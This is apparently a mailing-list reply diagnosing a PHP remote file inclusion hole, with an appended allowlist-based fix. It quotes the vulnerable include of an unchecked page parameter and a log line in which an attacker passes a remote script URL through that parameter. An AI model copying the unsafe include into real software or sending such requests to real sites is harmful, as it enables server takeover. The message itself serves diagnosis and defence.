Hi,

> at that mentioned time someone at least tried to access pages which are
> not accessible (index.php?img=1 e.g.)
>
> there definitely might be a problem in the code:
>
> if ( $_GET['page'] ) {
>     include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?

Looks like that's the one. Have a look at the following line in your log file:

82.103.132.227 - - [29/Oct/2006:20:12:34 +0100] "GET /index.php?page=http://www.excelsiorgroningen.nl/www/.admin/readname.txt? HTTP/1.1" 200 39094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"

Your script then includes and executes the script from the URL.

How to avoid? First, follow RULE ONE (TM): Always do sanity checks on user-supplied input.

The impact could have been avoided by setting allow_url_fopen to 0 in your php.ini. (Unless one of your scripts really, really needs this - but think twice before using it!)

But IMHO your approach to include files with dynamically generated paths is not a good idea anyway. Consider a different solution like redirecting the browser to the resulting URL. This won't prevent the attack from being successful, but it won't affect your server.

Best regards,
Holger
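
One way to apply the sanity check recommended in the reply above, as an added example that is not part of the original message or the poster's code: the ?page= value is matched against a fixed allowlist and the resolved path is confirmed to stay inside the application directory before anything is included. The page names, the pages/ directory and the function name resolve_page are assumptions made for illustration.

```php
<?php
// Added example, not the poster's code. Page names and directory layout are assumed.

// Allowlist: accepted ?page= value => directory under the base dir (hypothetical names).
const PAGES = [
    'home'    => 'home',
    'gallery' => 'gallery',
    'contact' => 'contact',
];

/**
 * Map the user-supplied ?page= value to a local file, or return null if rejected.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Reject arrays (?page[]=x) and anything else that is not a plain string.
    if (!is_string($requested)) {
        return null;
    }
    // Only exact allowlist keys pass; URLs, "../" sequences and NUL bytes never match.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . PAGES[$requested] . '/index.php');
    // Defence in depth: the resolved file must exist and lie under the base dir,
    // which also catches symlinks pointing elsewhere.
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// The request value is only ever used as a lookup key, never as part of a path.
$target = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

With this check the request from the log line above falls through to the 404 branch, because the URL is not a key in the allowlist; the php.ini setting then acts as a second layer rather than the only one.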